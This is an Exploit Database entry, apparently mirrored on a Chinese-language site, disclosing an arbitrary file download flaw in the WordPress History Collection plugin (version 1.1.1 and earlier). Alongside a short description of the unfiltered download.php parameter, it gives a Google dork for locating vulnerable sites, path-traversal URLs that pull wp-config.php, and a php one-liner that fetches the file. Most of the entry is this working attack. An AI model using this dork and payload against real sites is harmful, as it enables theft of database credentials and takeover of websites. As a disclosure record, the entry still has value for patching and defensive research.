WordPress Plugin History Collection 1.1.1 – Arbitrary File Download

• Exploit Database
• 16 阅读

• 作者： Kuroi'SH
  日期： 2015-06-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37254/

• # Exploit Title: WordPress History Collection <=1.1.1 Arbitraty File
  Download
  # Google Dork: inurl:plugins/history-collection
  # Date: 10/06/2015
  # Exploit Author: Kuroi'SH
  # Software Link: https://wordpress.org/plugins/history-collection/
  # Version: <=1.1.1
  # Tested on: Linux
  
  I-Description:
  Wordpress history collection plugin contains a file called download.php
  which is not filtering the GET input, it then uses this get input value to
  force the download of a file.
  (download.php, line 44):
  header("Content-Disposition: attachment;
  filename=\"".basename($filename)."\";" );
  2:Proof of concept:
  http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
  http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
  php -r "echo @file_get_contents('
  http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php')
  ;"
  
  Greetz:
  Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
  MuhmadEmad, redsm0ke
  By Kuroi'SH